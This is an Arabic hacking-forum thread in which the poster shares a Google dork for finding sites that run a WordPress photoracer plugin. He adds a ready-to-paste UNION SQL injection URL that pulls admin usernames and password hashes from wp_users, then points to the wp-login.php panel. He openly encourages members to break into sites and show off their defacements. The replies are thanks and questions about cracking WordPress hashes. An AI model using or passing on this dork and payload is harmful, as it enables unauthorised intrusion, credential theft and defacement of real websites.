WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول

[Dr.NaNo]

السلام عليكم ورحمه الله وبركاته .

كيفكم . أخواني إن شاء الله الكل بخير ..


اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .

ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي . لوول ..


نبدأ بسم الله .:


أولا.:

الدوركـ .:

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختار

اي واحد الي يعجبــك ..


ثانيــأ.:

الإٍستغلال .:

بتسوي كذا على طول ...:

wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

يعني مثال .:

www.xxx.com/

انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..

بطلع لك الباسورد واليوزر تبع الادمن .. .:


مثال كامل . على الاستغلال .:

www.xxx.com/
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

فهمـتووو كيف ياحلوين ..





ثالثـأ.:

لوحـة التحكم .:

www.xxx.com/wp-login.php

بس بتسوي بعد رابط الموقع هيك .:

wp-login.php

وبتطلع لك لوحـة التحكم ..... لوول ..






يالله ، بدي اشوف اندكسات لوول..



أخوكم .:

 Dr.NaNo

بالتوفيــــــــــــــق لــكــم ..

​

 

[Dr.NaNo]

مثل ماقال فلكانو ،، بتمرون على الموضوع وماحد يرد ..

على العموم مشكوووووورين جميـــعا كل الي مرر بالصفحــة بشكرهم كثيررررررررر لو بدكم بوسسه على الراس مش مشكله .


سلاآآم

 

[Marine]

تشكراتي

بس الورد بريس هاشات صعبه

 

[D-GhosT s3cur!Ty-Z]

مشكووووووور ياغالي

 

[hussin123]

جربت كثر من موقع ولكن للاسف ولا موقع صار

 

[NeTCaT-Ma]

thank you brother

 

[ubuntu]

Dr.NaNo
لو*سمحت*ابي*اعرف*طريقة decrypte الورد*برس*باس*ورد
Thx to All

 

[Zero]

[align=center]جميل اخي شكرااا[/align]

 

[mobdeen]

والله ثغرة شغالة وتمام بس المشكلة الهاش كيف نفكه

وهي شغالة والمصابة اكثر

 

[ubuntu]

yes the wordpress hash is complicated :S

 

[Sp1d3r]

مشكور على الموضوع القيم

سلمت بداك

 

[mr.ft]

مشكووووووووووور يعطيك الف عافيه